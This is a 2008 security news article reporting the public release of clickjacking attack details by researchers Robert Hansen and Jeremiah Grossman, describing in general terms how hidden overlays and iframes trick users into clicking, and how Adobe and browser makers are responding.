Clickjacking details released after attack proof-of-concept emerges

By Dennis Fisher, Executive Editor 08 Oct 2008 | SearchSecurity.com

Security Wire Daily News Digg This!     StumbleUpon     Del.icio.us

The details of the so-called clickjacking attacks have been released, and it turns out the class of problems affect a wide range of software, including Adobe Flash, Internet Explorer 8 and Firefox.

It's not a simple patch. It's probably a re-architecting of the browser security model. ... It's something that affects everyone. Jeremiah Grossman, chief technology officer, WhiteHat Security Inc.

The attacks, which were first were disclosed late last month, enable attackers to employ a number of methods to trick users into clicking on malicious links, including overlaying entire pages, using malicious iFrames and even turning off the security protections in Flash entirely. The vendors whose products are affected by the attacks are at various points in the remediation process, but the researchers who discovered the attacks released the details Tuesday night after a proof-of-concept of one of the attacks hit the Web.

Robert Hansen, an application security researcher who discovered the attacks along with Jeremiah Grossman, chief technology officer of WhiteHat Security Inc., wrote in a blog post detailing the clickjacking attacks that there are a number of different ways to accomplish clickjacking, and not all of the methods rely on JavaScript or cross-site request forgery (CSRF).

"First of all let me start by saying there are multiple variants of clickjacking. Some of it requires cross domain access, some doesn't. Some overlays entire pages over a page, some uses iframes to get you to click on one spot," Hansen wrote. "Some requires JavaScript, some doesn't. Some variants use CSRF to pre-load data in forms, some don't. Clickjacking does not cover any one of these use cases, but rather all of them."

The basic idea behind clickjacking is that it allows attackers to force Web users to click on a malicious link when they think they're clicking on something completely benign. For example, in one of the scenarios that Hansen and Grossman described, an attacker could construct a malicious Web page designed to install a rootkit or other malware on a user's PC and then overlay that entire page with a harmless-looking page, say one that has a Flash-based game on it. As the user clicks on the various links and buttons on the page, he is in fact clicking on hidden links controlled by the attacker.

SearchSecurity radio:

Hansen and Grossman also discovered ways in which the attacks can be used to silently take control of a webcam or microphone installed on a victim's machine.

Many of the issues that the researchers identified involve the use of Flash. There are separate problems with Flash in Firefox on Mac OS X and Flash in a beta version of IE 8. Adobe is in the process of addressing the Flash vulnerabilities in its upcoming release of Flash 10, Hansen wrote in his post, and Mozilla already fixed a problem with its NoScript plug-in in the latest releases of the add-on.

In an interview about the attacks before the details were released, Grossman said that although the kind of methods they used were known previously, their potential had been discounted.

"This issue has been long known. The Web security community knows about it," Grossman said. "But it has been for the most part underestimated as far as its potential impact. The browser vendors know what the problem is. But they don't know how or if they're going to address it. It's not a simple patch. It's probably a re-architecting of the browser security model. It's not just an Adobe bug. It's something that affects everyone."

Tags: Web Application Security,  Emerging Information Security Threats,  Application Attacks (Buffer Overflows, Cross-Site Scripting),  Web Browser Security,  Malware, Viruses, Trojans and Spyware,  VIEW ALL TAGS

Digg This!     StumbleUpon     Del.icio.us

RELATED CONTENT Web Application Security Attackers zero in on Web application vulnerabilities Self-defending Web applications thwart attacks Facebook, McAfee partner to fix social network security issues Web application attacks security guide: Preventing attacks and flaws Using unique device identification for bank website security Information security book excerpts and reviews Black box and white box testing: Which is best? InZero Systems launches hardware-based security gateway Web application vulnerability assessment shows patching progress Preventing SQL injection attacks: A network admin's perspective Emerging Information Security Threats Leverage Google Attacks to Improve Cybersecurity SCADA system, critical infrastructure security lacking, survey finds Preparing for future security threats, evolving malware Facebook attacks prompt investments in social networking security Information security podcasts: 2009 archive Hathaway calls for international cybercrime task force Active PDF attacks target Reader, Acrobat zero-day vulnerability Sites hit with massive automated SQL injection attack Cybercriminals invest in social networking attacks Best practices for (small) botnets Application Attacks (Buffer Overflows, Cross-Site Scripting) Latest zero-day attacks only target IE 6, Microsoft says Social networking security: Twitter, Facebook hacker attacks climbing Web application attacks security guide: Preventing attacks and flaws How to stop buffer-overflow attacks and find flaws, vulnerabilities Preventing and stopping SQL injection hack attacks Distributed denial-of-service protection: How to stop DDoS attacks Prevent cross-site scripting hacks with tools, testing Firefox, Opera, Safari browsers top list of high risk software Information security book excerpts and reviews Quiz: How to build secure applications Application Attacks (Buffer Overflows, Cross-Site Scripting) Research

RELATED GLOSSARY TERMS Terms from Whatis.com − the technology online dictionary anonymous Web surfing  (SearchSecurity.com) buffer overflow  (SearchSecurity.com) cache cramming  (SearchSecurity.com) cookie poisoning  (SearchSecurity.com) dictionary attack  (SearchSecurity.com) distributed denial-of-service attack  (SearchSecurity.com) JavaScript hijacking  (SearchSecurity.com) National Computer Security Center  (SearchSecurity.com) threat modeling  (SearchSecurity.com) trigraph  (SearchSecurity.com)

RELATED RESOURCES 2020software.com, trial software downloads for accounting software, ERP software, CRM software and business software systems Search Bitpipe.com for the latest white papers and business webcasts Whatis.com, the online computer dictionary